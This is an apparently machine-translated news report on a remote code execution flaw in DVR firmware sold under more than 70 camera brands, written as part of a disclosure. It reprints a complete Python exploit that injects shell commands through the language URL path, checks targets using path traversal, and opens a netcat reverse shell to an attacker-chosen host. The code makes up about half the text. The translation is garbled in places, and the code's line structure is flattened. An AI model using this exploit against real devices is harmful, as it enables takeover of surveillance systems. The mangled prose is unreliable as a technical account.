Black more than 70 surveillance cameras are so simple

Black more than 70 surveillance cameras are so simple

 

 

Recently, a security researcher found that surveillance cameras sold by more than 70 vendors are vulnerable to Remote Code Execution (RCE) attacks.

According to the Rotem Kemer study by security researcher, surveillance cameras sold by more than 70 vendors are vulnerable to Remote Code Execution (RCE) attacks.

The researchers noted that the products being sold by the supplier use the same firmware that is vulnerable to RCE attacks.

In the "White Label" business model, a variety of suppliers simply sell their tags on the same product, but unfortunately, they are not qualified to develop software and hardware.

This fragile firmware was developed by TVT, a Chinese manufacturer, and Kerner analyzed the cause of the easy-to-attack DVR boxes in closed-circuit television systems.

The firmware product was purchased from an Israeli company that sells closed-circuit television systems. Its Code also shows that it is a vulnerable HTTP server.

Security Vulnerabilities rely on servers to check for directories in a given language. If the folder does not exist, the software extracts a remote command to execute the open password.

The following is the explanation of the researchers:

It reads the URL if the URL contains the following content:/language/[language]/index.html.

If the directory exists, the language content between the slash is extracted and checked. If the directory does not exist, the command is executed directly.

tar –zxf /mnt/mtd/WebSites/language.tar.gz [language]/* -C /nfsdir/language

This basically gives us a chance to execute remote commands.

The following is a proof of concept code that affects the firmware vulnerability:

#!/usr/bin/python# http://www.kerneronsec.com/2016/02/remote-code-execution-in-cctv-dvrs-of.html__author__ = 'Rotem Kerner'from sys import argvimport optparsefrom urlparse import urlparsefrom re import compileimport socketimport requestsfrom requests.exceptions import ConnectionError, Timeout, ContentDecodingErrorfrom socket import timeoutdef main():    # parse command line options and atguments    optparser = optparse.OptionParser(usage="%s 
  
    [options]" % argv[0])    optparser.add_option('-c','--check',action="store_true",dest="checkvuln", default=False,                         help="Check if target is vulnerable")    optparser.add_option('-e','--exploit', action="store", type="string", dest="connback",                         help="Fire the exploit against the given target URL")    (options, args) = optparser.parse_args()    try:        target = args[0]    except IndexError:        optparser.print_help()        exit()    target_url = urlparse(target)    # validating hostname    if not target_url.hostname:        print "[X] supplied target "%s" is not a valid URL" % target        optparser.print_help()        exit()    # A little hack to handle read timeouts, since urllib2 doesnt give us this functionality.    socket.setdefaulttimeout(10)    # is -c flag on check if target url is vulnrable.    if options.checkvuln is True:        print "[!] Checking if target "%s" is vulnable..." % target_url.netloc        try:            # Write file            raw_url_request('%s://%s/language/Swedish${IFS}&&echo${IFS}1>test&&tar${IFS}/string.js'                         % (target_url.scheme, target_url.netloc))            # Read the file.            response = raw_url_request('%s:/%s/../../../../../../../mnt/mtd/test' % (target_url.scheme, target_url.netloc))            # remove it..            raw_url_request('%s://%s/language/Swedish${IFS}&&rm${IFS}test&&tar${IFS}/string.js'                         % (target_url.scheme, target_url.netloc))        except (ConnectionError, Timeout, timeout) as e:            print "[X] Unable to connect. reason: %s.  exiting..." % e.message            return        if response.text[0] != '1':             print "[X] Expected response content first char to be '1' got %s. exiting..." % response.text            return        print "[V] Target "%s" is vulnerable!" % target_url.netloc    # if -e is on then fire exploit,    if options.connback is not None:        # Validate connect-back information.        pattern = compile('(?P
   
    [a-zA-Z0-9.-]+):(?P
    
     [0-9]+)')        match = pattern.search(options.connback)        if not match:            print "[X] given connect back "%s" should be in the format for host:port" % options.connback            optparser.print_help()            exit()        # fire remote code execution!        # Three ..        try:            raw_url_request('%s://%s/language/Swedish${IFS}&&echo${IFS}nc${IFS}%s${IFS}%s${IFS}>e&&${IFS}/a'                        % (target_url.scheme, target_url.netloc, match.group('host'), match.group('port')))        # Two ...            raw_url_request('%s://%s/language/Swedish${IFS}&&echo${IFS}"-e${IFS}$SHELL${IFS}">>e&&${IFS}/a'                         % (target_url.scheme, target_url.netloc))        # One. Left off!            raw_url_request('%s://%s/language/Swedish&&$(cat${IFS}e)${IFS}&>r&&${IFS}/s'                         % (target_url.scheme, target_url.netloc))        except (ConnectionError, Timeout, timeout) as e:            print "[X] Unable to connect reason: %s.  exiting..." % e.message        print "[V] Exploit payload sent!, if nothing went wrong we should be getting a reversed remote shell at %s:%s"               % (match.group('host'), match.group('port'))# Disabling URL encode hackdef raw_url_request(url):    r = requests.Request('GET')    r.url = url    r = r.prepare()    # set url without encoding    r.url = url    s = requests.Session()    return s.send(r)if __name__ == '__main__':    main()
    
   
  

He noticed that tens of thousands of products are currently using this HTTP server. He makes such a positive judgment after querying the Shodan search engine, but there may be more products in this search engine.

The researchers said, "After quickly querying Shodan, we found that the distribution was over 30 thousand. This is a lot, but I believe it is only a small part ."

Kerner tried to report the problem to the original manufacturer TVT, but was not responded, so he decided to disclose the list of vendors selling defective firmware devices.

List:

Ademco, ATS Alarmes extends lgy and ststems, Area1Protection, Avio, Black Hawk Security, Capture,China security systemsCocktail Service, Cpsecured, cp plus, Digital Eye 'z no website, Diote Service & Consulting, DVR Kapta, ELVOX, ET Vision, Extra Eye 4 U, eyemotion, EDS, Fujitsu, full HD 1080 p, Gazer, Goldeye, Goldmaster, Grizzly, HD IViewer, Hi-View, Ipcom, IPOX, IR, ISC Illinois Security Cameras, inc. JFL Alarmes, Lince, LOT, Lux, Lynx Security, Magtec, Meriva Security, Multistar, Navaio, NoVus, Optivision, PARA Vision, Provision-ISR, Q-See, Quest Ek, Retail Solution Inc, RIT Huston. com, ROD Security cameras, Satvision, Sav Technology, Skilleye, Smarteye, Superior Electrial Systems, TechShell, TechSon shortmate, TecVoz, TeleEye, Tomura, truVue TVT Umbrella United Video Security System, inc, Universal IT Solutions, us it Express, U-Spy Store, Ventetian, V-Gurad Security, Vid8, Vtek, Vision Line, Visar, Vodotech.com, Vook, Watchman, Xrplus, Yansi, Zetec, ZoomX.